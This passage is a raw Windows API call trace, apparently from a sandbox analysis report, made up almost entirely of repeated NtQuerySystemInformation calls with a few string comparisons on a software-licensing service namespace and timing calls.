ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0219.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.240] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0219.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a8, Length=0x50, ResultLength=0x0) [0219.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x38, ResultLength=0x0) [0219.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0219.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0219.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0219.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x28, ResultLength=0x0) [0219.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x38, ResultLength=0x0) [0219.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0219.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x38, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x20, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x38, ResultLength=0x0) [0219.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x20, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb8, Length=0x50, ResultLength=0x0) [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x28, ResultLength=0x0) [0219.426] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb8, Length=0x50, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb8, Length=0x50, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb20, Length=0x28, ResultLength=0x0) [0219.427] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0219.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x38, ResultLength=0x0) [0219.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x28, ResultLength=0x0) [0219.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x28, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd900, Length=0x28, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x28, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x38, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0219.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x38, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x20, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x20, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x20, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x20, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x38, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x20, ResultLength=0x0) [0219.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x20, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x20, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.441] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67fdc00 | out: lpSystemTimeAsFileTime=0xf7a67fdc00*(dwLowDateTime=0x1529c8d9, dwHighDateTime=0x1d63874)) [0219.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb8, Length=0x50, ResultLength=0x0) [0219.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0219.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb08, Length=0x50, ResultLength=0x0) [0219.441] GetTickCount () returned 0x1177532 [0219.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x58, ResultLength=0x0) [0219.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x28, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd790, Length=0x28, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0219.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd810, Length=0x28, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x38, ResultLength=0x0) [0219.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x20, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x20, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x58, ResultLength=0x0) [0219.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0219.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x28, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7e0, Length=0x28, ResultLength=0x0) [0219.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7e0, Length=0x28, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x38, ResultLength=0x0) [0219.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 